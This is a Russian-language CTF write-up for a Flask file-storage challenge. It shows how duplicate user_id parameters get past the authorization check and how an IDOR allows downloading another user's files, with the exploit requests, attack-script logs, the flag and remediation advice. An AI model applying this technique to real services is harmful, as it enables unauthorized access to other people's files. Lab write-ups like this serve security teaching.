Корпоративное хранилище — write‑up (Medium)
===========================================

Флаг: CSC{UN4UTH0R1Z3D_ACC3SS_TO_S3CR3T_F1L3S}

Разведка
--------
Из исходников видно:
- Flask‑приложение с авторизацией, загрузкой/скачиванием файлов.
- /api/files принимает несколько параметров user_id и делает кривую проверку:
  * первый user_id используется для выборки файлов;
  * последний user_id сравнивается с session['user_id'] для «авторизации».
- /file/<file_id> отдаёт файл только по идентификатору (IDOR).

Уязвимости
-----------
1) **Parameter Confusion** в /api/files:
   - запрос /api/files?user_id=<victim>&user_id=<me> пройдёт проверку,
     потому что последний user_id совпадёт с моим,
     а файлы вернутся жертвы (первый параметр).

2) **IDOR** в /file/<file_id>:
   - скачивание файла по его id без проверки владельца.

Эксплуатация
------------
1. Зарегистрировались и вошли в систему (получили сессию).
2. Определили свой user_id, перебирав ?user_id=0&user_id=g.
   Когда g == session['user_id'], сервер перестал возвращать 403 → мой id = 43.
3. Запросили файлы жертвы (админ, id=1):
   GET /api/files?user_id=1&user_id=43 → {"files": [{"file_id": "b00b73ebe000", "filename": "secret.txt"}]}
4. Скачали файл напрямую:
   GET /file/b00b73ebe000 → CSC{UN4UTH0R1Z3D_ACC3SS_TO_S3CR3T_F1L3S}.

Логи (фрагмент)
---------------
[?] Probe my-id guess 43: 200  
[+] My inferred user_id: 43  
[+] List files for victim 1 (my_id=43) -> 200  
{'files': [{'file_id': 'b00b73ebe000', 'filename': 'secret.txt'}]}  
[+] Download b00b73ebe000 -> 200 (40 bytes)  
CSC{UN4UTH0R1Z3D_ACC3SS_TO_S3CR3T_F1L3S}

Почему это работает
-------------------
- Авторизация в /api/files опирается только на последний user_id в запросе,
  а выборка файлов — на первый параметр.
- /file/<file_id> не проверяет владельца файла.

Рекомендации
------------
- Ограничить количество параметров, принимать только один user_id.
- В /file/<file_id> проверять file.owner_id == session['user_id'].
- Добавить тесты на многократные параметры и IDOR.

Итог
----
Комбинация parameter confusion + IDOR позволяет читать чужие файлы,
в том числе админский секрет, и получить флаг.

Флаг: CSC{UN4UTH0R1Z3D_ACC3SS_TO_S3CR3T_F1L3S}
